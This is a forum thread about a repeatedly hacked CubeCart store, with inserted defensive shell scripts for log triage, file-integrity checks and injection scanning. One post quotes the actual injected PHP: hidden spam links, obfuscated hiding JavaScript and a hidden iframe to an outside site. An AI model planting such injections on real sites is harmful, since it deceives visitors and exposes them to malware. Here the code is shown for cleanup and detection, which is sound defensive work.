Guest Posted August 9, 2010
So the last few days, I've had someone alter the .htaccess file on one of my CubeCart v3 stores to redirect to a Chinese escort site! When it first happened, the store was still on v3 2.0.14 and I also found some code added to /index.php. I updated everything to 3.0.20 and cleaned the compromised files. I also disabled tellafriend (deleted all code from the file). It is shared hosting (in fact, I have a master account with unlimited domains and databases - it was only on one of the 20+ sites I have on the same account - not all are active or CubeCart). It just happened again, after I upgraded to 3.0.20 and did the above steps! I changed the account password, though my hosts didn't think they were getting in via the account but felt it was probably exploiting an outdated script. I cannot think of any scripts or anything on that site that isn't on my other live sites, so I'm scratching my head as to how this person is getting in. The only scripts I can think of beyond the usual CC ones are chat4support live chat and some Google Friend Connect, Facebook, and Twitter scripts (but again, they are on all my other stores as well). So I thought I'd ask if anyone has had anything similar happen and if you figured out how they got in or how to stop it? Thanks!
Guest Posted August 10, 2010
They managed to do it AGAIN after I changed my password (to a totally randomly generated combo of letters, numbers, upper/lower etc.). I have been searching all over the files to try to find some script they put in that keeps being triggered, but no luck so far. So annoying since they are doing it to a site I advertise as being "kid friendly" - which is probably why they targeted it, I know. I deleted my Google Friend Connect scripts since I wasn't using them much on that site anyway, but am at a loss as to what else to try.
Guest Posted August 12, 2010
This is still happening every day. Any idea of how I can stop it? I've changed passwords, deleted everything I can find script-wise, changed chmod to 004 on .htaccess - and still they are somehow redirecting the thing to an escort service! With Halloween approaching, this is about to be my biggest site (cosplaycostumecloset.com) and I honestly don't know what the heck to try next.
vokf Posted August 12, 2010
> This is still happening every day. Any idea of how I can stop it? I've changed passwords, deleted everything I can find script-wise, changed chmod to 004 on .htaccess - and still they are somehow redirecting the thing to an escort service! With Halloween approaching, this is about to be my biggest site (cosplaycostumecloset.com) and I honestly don't know what the heck to try next

This could be an attack from a compromised script on another user's site/account on the server.

Is the .htaccess file being overwritten, or edited? I.e., does it still contain any customisation/SEO bits, or is it now simply a redirect? Also check the date/time of the last change - is it always the same time each day?

Ensure all other scripts are up to date - check their forums/change notes for updates. Just because your other sites are not affected does not mean the scripts are not the entry vector!

Check the languages/homepage folder on CubeCart is not writeable; I know that used to be recommended.

Also see if you can get the raw HTTP logs and FTP logs. The best people to help with this would be your hosting company. They should have access logs - if you can determine the time of the change, they should be able to work out what is going on.

Jason
Guest Posted August 14, 2010
Well, thought I had it solved, but today someone edited my index.php file in the root directory. Quickly solved it by uploading my backup page, but... wasn't to the same escort site, this one was about footwear. I don't know if they edited or replaced my files - and my hosting company doesn't think they are hacking into my account itself (since I've changed the password to an auto-generated random one, I'm also doubting they are doing that), but cannot figure out how to lock them out for good :(
vokf Posted August 14, 2010
> Well, thought I had it solved, but today someone edited my index.php file in the root directory. Quickly solved it by uploading my backup page, but... wasn't to the same escort site, this one was about footwear. I don't know if they edited or replaced my files - and my hosting company doesn't think they are hacking into my account itself (since I've changed the password to an auto-generated random one, I'm also doubting they are doing that), but cannot figure out how to lock them out for good

If they are getting in via cross-site scripting (XSS), then the hack will involve calling a script on your site(s). This request will generate an event in the web server log. Tell the hosting company the exact date+time of the attack, and get them to check the Apache raw logs for anything suspicious. Also ask them for the same info on FTP. It's in the host's interest to assist you with this, and leaving you with constant attacks like this is not good.

You may have access to the raw logs - in which case PM them to me.
Guest bluebadger66 Posted August 24, 2010
I do not know too much about this type of problem, but when I had fears that my files were being changed, my hoster advised me to check my file permissions. There were lots that were set for anyone to write to. It is just a thought, and I am sure there is an article on here somewhere.

Cheers,
Martin
Guest Posted August 24, 2010
I *think* I finally have them stopped. I changed permissions on my .htaccess and they haven't redirected it since. I have been slowly updating all my stores to 3.0.20 as well and deleting the tellafriend scripts just to be on the safe side. Thanks for the help and suggestions, guys. So far, so good though :(
Guest Posted September 7, 2010
Well, update. My hacker doesn't seem to be able to redirect my page anymore - I think the .htaccess chmod stopped that. But today I discovered they had added marquee text to the top and bottom of my index.php (the root file), above and below the normal CubeCart code (easy to delete really, and it was unreadable on the site since the text overwrote itself). Haven't found any scripts added that aren't supposed to be there, but it's still annoying :(
Guest Posted September 21, 2010
> Well, update. My hacker doesn't seem to be able to redirect my page anymore - I think the .htaccess chmod stopped that. But today I discovered they had added marquee text to the top and bottom of my index.php (the root file), above and below the normal CubeCart code (easy to delete really, and it was unreadable on the site since the text overwrote itself). Haven't found any scripts added that aren't supposed to be there, but it's still annoying

This is still happening like once a week. Any ideas?
bsmither Posted September 21, 2010
You must convince your hosting provider to install an access and file list modification logging tool on the several server directories that hold your site's files, and make those logs available to you. If they aren't working to find the method of intrusion themselves - and the server techs have this responsibility sitting squarely on their shoulders - then this has to be a breach of even the crummiest service level agreement.

And you haven't told us whether your host has admitted if any of the other sites hosted on that particular server have been vandalized. If so, then the vandals are reaching your directories through someone else's vulnerability.

As you describe it, you found "marquee text" above the CC code in {root}/index.php. So I guess whatever that was wasn't meant to be sent immediately out to the browser, since if it did, that should have caused a "Headers already sent" error.
Guest Posted September 21, 2010
I actually haven't talked to my hosts about it much after the first attack. They usually just tell me to check that all scripts are up to date, which is why I updated that CubeCart installation to v3.0.20. Honestly, not sure what I'm looking for in logs. I have them, just no clue what to look for. I'm assuming you mean the raw access logs??? Or is it called something else?

No errors are triggered. The code is being added above and below the existing CubeCart code in root/index.php, above the PHP start and end tags. At the bottom, it's added after a ton of blank lines; at the top, it's a single line of code with tons of links added above the <?php and all the code. I'm assuming it is a script they are using to insert this code? The chmod on that file is 644 - I cannot make it 444 (I've tried and it reverts itself back), so really not sure how to totally keep them from doing it.
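The poster above has the raw access logs but no idea what to look for in them. As an added example (not code posted by anyone in this thread), the script below does what vokf suggested: it takes the modification time of the altered file and filters a combined-format Apache access log down to the requests made in the minutes around it, tagging POSTs and direct requests for .php files under directories a shopper's browser never calls on its own. The log lines are constructed; the addresses, paths and times are made up.

```shell
#!/bin/sh
# Added example, not code from anyone in this thread. Given the modification time
# of a defaced file (from `ls -l --time-style=full-iso` or `stat`), pull the
# Apache access-log lines from the minutes around it and flag the ones worth
# reading first: any POST, and any direct request for a .php file under a
# directory a shopper's browser never needs to call (includes/, images/, classes/).
# The log lines below are constructed; addresses, paths and times are made up.

SAMPLE_LOG='203.0.113.7 - - [21/Sep/2010:03:12:44 +0000] "GET /index.php HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
203.0.113.7 - - [21/Sep/2010:03:12:45 +0000] "GET /images/logo.gif HTTP/1.1" 200 5122 "-" "Mozilla/5.0"
198.51.100.23 - - [21/Sep/2010:03:13:58 +0000] "GET /includes/goobermods/coupon_giftcard_manager/link.php HTTP/1.1" 200 31 "-" "-"
198.51.100.23 - - [21/Sep/2010:03:14:02 +0000] "POST /includes/goobermods/coupon_giftcard_manager/llink.php HTTP/1.1" 200 56 "-" "-"
198.51.100.23 - - [21/Sep/2010:03:14:03 +0000] "GET /index.php HTTP/1.1" 200 9001 "-" "-"
203.0.113.9 - - [21/Sep/2010:09:40:10 +0000] "GET /index.php?_a=viewCat&catId=3 HTTP/1.1" 200 7321 "-" "Mozilla/5.0"'

# Print every request logged within WINDOW minutes (default 5) of DAY HH:MM.
# DAY is written as it appears in the log, e.g. 21/Sep/2010.
requests_near() {
    logfile=$1; day=$2; hhmm=$3; window=${4:-5}
    awk -v day="$day" -v hhmm="$hhmm" -v win="$window" '
        function mins(t,  p) { split(t, p, ":"); return p[1] * 60 + p[2] }
        {
            ts = substr($4, 2)                   # field 4 is "[21/Sep/2010:03:14:02"
            split(ts, part, ":")                 # part[1]=day part[2]=HH part[3]=MM
            if (part[1] != day) next
            delta = mins(part[2] ":" part[3]) - mins(hhmm)
            if (delta < 0) delta = -delta
            if (delta <= win) print
        }' "$logfile"
}

# From access-log lines on stdin, keep the ones to read first and tag them.
flag_suspicious() {
    awk '
        {
            method = substr($6, 2)               # field 6 is "\"POST"; drop the quote
            path = $7
            sub(/\?.*/, "", path)                # ignore the query string
            if (method == "POST") { print "POST   " $0; next }
            if (path ~ /^\/(includes|images|classes)\/.*\.php$/) print "DIRECT " $0
        }'
}

# Write the constructed sample to a temp file and triage it for a file whose
# mtime was 21/Sep/2010 03:14. Prints the flagged lines.
triage_demo() {
    tmp=$(mktemp)
    printf '%s\n' "$SAMPLE_LOG" > "$tmp"
    requests_near "$tmp" "21/Sep/2010" "03:14" 5 | flag_suspicious
    rm -f "$tmp"
}

triage_demo
```

Against a real log the call is `requests_near access.log 21/Sep/2010 03:14 | flag_suspicious`. The paths tagged DIRECT are the ones to compare against a clean copy of CubeCart or of the mod, and a POST to a file that never takes form input is a strong sign that a planted script is being driven from outside.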
Guest Posted September 23, 2010
Fingers crossed, but I think I finally found where they were getting in. I found 2 files, link.php (which was encrypted) and llink.php, in /includes/goobermods/coupon_giftcard_manager (Goober's coupon mod), and when I looked at the original files for the mod (and where it is installed on another of my stores), discovered these files shouldn't be there. I deleted them both and changed permissions on both folders to 555, so hopefully that will stop it this time. I'll let you know if it does or not, but if anyone else has this issue, look *everywhere* for files you don't recognize. I had compared all the files to the v3.0.20 standard files, but had skipped the mods! (silly me)!
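The post above compared the store against the stock v3.0.20 files by hand and missed the mod folder, and bluebadger66 earlier pointed at loose file permissions. As an added example covering both points (not code posted by anyone in this thread), the script below hashes a known-good tree, compares it with the live tree to report modified, added and missing files, and lists everything world-writable under the web root. It assumes GNU coreutils (sha256sum, find, awk, sort); the demo trees it builds are constructed.

```shell
#!/bin/sh
# Added example, not code from anyone in this thread. Two checks that need no
# tooling beyond coreutils: (1) hash every file in a known-good tree (a fresh
# CubeCart download with your mods applied) and compare it with the live tree,
# reporting changed files, files that exist only on the live side (the way
# link.php/llink.php appeared inside a mod folder above) and files that went
# missing; (2) list world-writable files and directories under the web root.
# The demo trees built below are constructed; real CubeCart trees are larger.

# Emit "sha256  ./path" for every regular file under $1, sorted by path.
# (Paths containing spaces would confuse the comparison; CubeCart has none.)
manifest() {
    ( cd "$1" && find . -type f -exec sha256sum {} + ) | sort -k2
}

# Compare known-good manifest $1 with live manifest $2.
compare_manifests() {
    awk '
        NR == FNR { good[$2] = $1; next }       # first file: the known-good tree
        {
            if (!($2 in good))       print "ADDED    " $2
            else if (good[$2] != $1) print "MODIFIED " $2
            seen[$2] = 1
        }
        END { for (p in good) if (!(p in seen)) print "MISSING  " p }
    ' "$1" "$2" | sort
}

# Files and directories under $1 that every account on the server may write to
# (-perm -002: the "other" write bit is set); symlinks are skipped.
world_writable() {
    find "$1" ! -type l -perm -002
}

# Build a tiny known-good tree and a live tree with one edited file, one planted
# file and one directory left world-writable. Echoes the temp root.
build_demo_trees() {
    root=$(mktemp -d)
    for side in good live; do
        mkdir -p "$root/$side/includes/goobermods/coupon_giftcard_manager" "$root/$side/images"
        printf '<?php\n// store front controller\n' > "$root/$side/index.php"
        printf '<?php\n// shared functions\n'       > "$root/$side/includes/functions.inc.php"
        printf '<?php\n// coupon mod\n'             > "$root/$side/includes/goobermods/coupon_giftcard_manager/index.php"
    done
    chmod -R u=rwX,go=rX "$root/good" "$root/live"          # 755 dirs, 644 files
    printf '\n// lines that should not be here\n' >> "$root/live/includes/functions.inc.php"
    printf '<?php\n// planted file\n' > "$root/live/includes/goobermods/coupon_giftcard_manager/llink.php"
    chmod o+w "$root/live/images"                             # the weak permission
    echo "$root"
}

# Run both checks on the demo trees and print the findings.
integrity_demo() {
    root=$(build_demo_trees)
    manifest "$root/good" > "$root/good.manifest"
    manifest "$root/live" > "$root/live.manifest"
    compare_manifests "$root/good.manifest" "$root/live.manifest"
    world_writable "$root/live" | sed "s#^$root/live#WRITABLE #"
    rm -rf "$root"
}

integrity_demo
```

In practice the known-good manifest is generated once from a clean copy and kept off the web server, so that the next time the store is defaced a single `compare_manifests` run names every file to restore, mods included, instead of a file-by-file comparison.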
Guest Posted September 23, 2010
Grrrr. Well, not stopped yet. The top code reappeared, though those 2 files didn't return. Thought I had it figured out :(
Guest fandango Posted September 26, 2010
Hiya Mysty,

This sounds like a hack attack I had not long ago. Unfortunately I had to completely delete and reinstall all my files and folders and install a fresh copy of CC3. I do remember reading up on this Zombie attack, as it was called, and they injected code into the index.php files from scripts that had been inserted into the images folders. I hope you sort it out and don't have to do what I did. (Took forever.)

Fandango
SibeSpace Posted September 26, 2010
My site has been hacked today too. Customer got a browser warning:

"Visiting this site may harm your computer
The website at www..... contains elements from the site robingood.cz.cc which appears to host malware - software"

It had infected root/index.php, admin/index.php, admin/modules/index.php & admin/modules/3rdparty/index.php. No idea how they got in, nor how to stop them from doing it again. Any suggestions please? Thanks
SibeSpace Posted September 26, 2010
I'm also getting an error on the Admin home page:

Warning: MagpieRSS: Failed to fetch http://forums.cubecart.com/index.php?act=rssout&id=1 (HTTP Response: HTTP/1.1 404 Not Found ) in /classes/rss_fetch.inc on line 238
Warning: Invalid argument supplied for foreach() in /admin/index.php on line 152
bsmither Posted September 26, 2010
Same suggestion as we gave Mysty - contact your host and ask for the access logs for your site, HTTP requests and FTP logins, and ask your host for help in discovering the vulnerability. Ask your host to put a logging tool on your site that logs all accesses, regardless of method, to your store root. I am not familiar with Linux, so my knowledge of whether such a tool exists is null, but I am confident a Linux guru somewhere has created such a tool.

> Warning: MagpieRSS:

Remove the RSS URL from the settings page. A number of messages on this board are mentioning that. Maybe a problem with cubecart.com?
SibeSpace Posted September 30, 2010
Thanks. Removed the RSS feed as suggested - that error has now gone. I uploaded a backup copy of all the infected files, changed my hosting password & so far all is OK. I guess I won't know if I've stopped another attack until it happens...
Guest Posted October 9, 2010
The latest files I found compromised were /admin/misc/licForm.php and lookupip.php. I re-uploaded the uncorrupted files and changed their file permissions to 444 to see if that stops it.
Guest Posted November 2, 2010
Well, update. I've found inserted code in just about all my includes files. No idea how it all got there, but thought I'd give someone else an idea of where to look for changes. Some of them were repeated more than once; sometimes the block was there just once. I copied what *should* have been there and pasted it over the junk. These are right under the CubeCart comment block at the top of the files.

```php
if (eregi(".inc.php",$HTTP_SERVER_VARS['PHP_SELF']) || eregi(".inc.php",$_SERVER['PHP_SELF'])) {
    echo "<html>\r\n<head>\r\n<title>Forbidden 403</title>\r\n</head>\r\n<body><div id='302'><h2><a href='http://www.2daban.cn/' title='西门子PLC' >西门子PLC</a></h2><h2><a href='http://www.fashion-pictures-show.com/' title='Fashion'>Fashion</a></h2><h2><a href='http://www.disease-picture.com/' title='Health'>Health</a></h2><h2><a href='http://www.siemens-plc-adapter.com/' title='SIEMENS PLC adapter' >SIEMENS PLC adapter</a></h2><h2><a href='http://www.plc-programming-cable.com/' title='plc programming cable'>plc programming cable</a></h2><h2><a href='http://www.pci-pcmcia-express.com/' title='PCI,PCMCIA,Express card'>PCI,PCMCIA,Express card</a></h2><h2><a href='http://www.electronic-pic.com/' title='Electronic'>Electronic</a></h2></div><script>document.getElementById('3'+'0'+'2').style.display='n'+'o'+'ne'</script><h3>Forbidden 403</h3>\r\nThe document you are requesting is forbidden.\r\n<iframe src=http://googlerank.info width=1 height=1 style=display:none></iframe><div id='257'><h2><a href='http://www.2daban.cn/' title='西门子PLC' >西门子PLC</a></h2><h2><a href='http://www.fashion-pictures-show.com/' title='Fashion'>Fashion</a></h2><h2><a href='http://www.disease-picture.com/' title='Health'>Health</a></h2><h2><a href='http://www.siemens-plc-adapter.com/' title='SIEMENS PLC adapter' >SIEMENS PLC adapter</a></h2><h2><a href='http://www.plc-programming-cable.com/' title='plc programming cable'>plc programming cable</a></h2><h2><a href='http://www.pci-pcmcia-express.com/' title='PCI,PCMCIA,Express card'>PCI,PCMCIA,Express card</a></h2><h2><a href='http://www.electronic-pic.com/' title='Electronic'>Electronic</a></h2></div><script>document.getElementById('2'+'5'+'7').style.display='non'+'e'</script></body>\r\n</html>";
    exit;
}
```

What the code *should* look like is:

```php
if (eregi(".inc.php",$HTTP_SERVER_VARS['PHP_SELF']) || eregi(".inc.php",$_SERVER['PHP_SELF'])) {
    echo "<html>\r\n<head>\r\n<title>Forbidden 403</title>\r\n</head>\r\n<body><h3>Forbidden 403</h3>\r\nThe document you are requesting is forbidden.\r\n</body>\r\n</html>";
    exit;
}
```
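Added example, not code posted by anyone in this thread: a scanner for the traces the posts above describe, for the case where no pristine copy is at hand to compare against. It flags text before the opening <?php or after the closing ?> (the marquee case from the root index.php), <marquee> tags, 1x1 or display:none iframes, and JavaScript that hides an element whose id is assembled from string fragments, like the getElementById('3'+'0'+'2') call in the injected block. The fixture files are constructed and use example.invalid in place of the link targets in the real payload.

```shell
#!/bin/sh
# Added example, not code from anyone in this thread. When there is no clean copy
# to diff against, the injections described here still leave traces a script can
# find in a PHP file: text before the opening <?php tag or after the closing ?>
# (the marquee case), a 1x1 or display:none iframe, a <marquee> tag, and
# JavaScript that hides an element whose id is assembled from string fragments,
# as in getElementById('3'+'0'+'2'). Each trace is reported per file so the hits
# can be checked against a pristine download. The fixture files are constructed;
# example.invalid stands in for the link targets in the real payload.

# True (exit 0) when non-blank text follows the last "?>" in file $1.
trailer_after_close() {
    awk '
        { line[NR] = $0; if (index($0, "?>")) last = NR }
        END {
            if (!last) exit 1
            tail = substr(line[last], index(line[last], "?>") + 2)
            for (i = last + 1; i <= NR; i++) tail = tail line[i]
            gsub(/[[:space:]]/, "", tail)
            if (length(tail) > 0) exit 0
            exit 1
        }' "$1"
}

# Report indicator hits for one PHP file, one "REASON  path" line each.
scan_php_file() {
    f=$1
    # CubeCart files begin with "<?php"; anything in front of it was prepended.
    case "$(head -c 5 "$f")" in
        '<?php') ;;
        *)       echo "PREAMBLE       $f" ;;
    esac
    trailer_after_close "$f"                                           && echo "TRAILER        $f"
    grep -q -i '<marquee' "$f"                                         && echo "MARQUEE        $f"
    grep -q -i -E '<iframe[^>]*(width=1|height=1|display: *none)' "$f" && echo "HIDDEN_IFRAME  $f"
    grep -q -E "getElementById\('[^']*'\+" "$f"                        && echo "OBFUSCATED_JS  $f"
    return 0
}

# Scan every .php file under $1.
scan_tree() {
    find "$1" -type f -name '*.php' | sort | while read -r f; do scan_php_file "$f"; done
}

# Build three constructed files: a clean include, the same include with the
# injected block, and a root index.php with marquee text before and after the PHP.
build_demo_files() {
    dir=$(mktemp -d)
    cat > "$dir/clean.inc.php" <<'EOF'
<?php
/* CubeCart comment block */
if (eregi(".inc.php",$HTTP_SERVER_VARS['PHP_SELF']) || eregi(".inc.php",$_SERVER['PHP_SELF'])) {
    echo "<html>\r\n<head>\r\n<title>Forbidden 403</title>\r\n</head>\r\n<body><h3>Forbidden 403</h3>\r\nThe document you are requesting is forbidden.\r\n</body>\r\n</html>"; exit;
}
?>
EOF
    cat > "$dir/injected.inc.php" <<'EOF'
<?php
/* CubeCart comment block */
if (eregi(".inc.php",$HTTP_SERVER_VARS['PHP_SELF']) || eregi(".inc.php",$_SERVER['PHP_SELF'])) {
    echo "<html><body><div id='302'><h2><a href='http://example.invalid/'>spam</a></h2></div><script>document.getElementById('3'+'0'+'2').style.display='n'+'o'+'ne'</script><h3>Forbidden 403</h3><iframe src=http://example.invalid width=1 height=1 style=display:none></iframe></body></html>"; exit;
}
?>
EOF
    cat > "$dir/index.php" <<'EOF'
<marquee><a href='http://example.invalid/'>spam</a></marquee>
<?php
// store front controller
?>



<marquee>more spam</marquee>
EOF
    echo "$dir"
}

# Scan the constructed files and print the hits with the temp path stripped.
scan_demo() {
    dir=$(build_demo_files)
    scan_tree "$dir" | sed "s#$dir/##"
    rm -rf "$dir"
}

scan_demo
```

The PREAMBLE and TRAILER checks are what catch the root index.php case from earlier in the thread, where the PHP itself was untouched and only text outside the tags was added; the other three are cheap pattern matches and will produce the odd false positive in a skin template, so each hit should be read rather than deleted blindly.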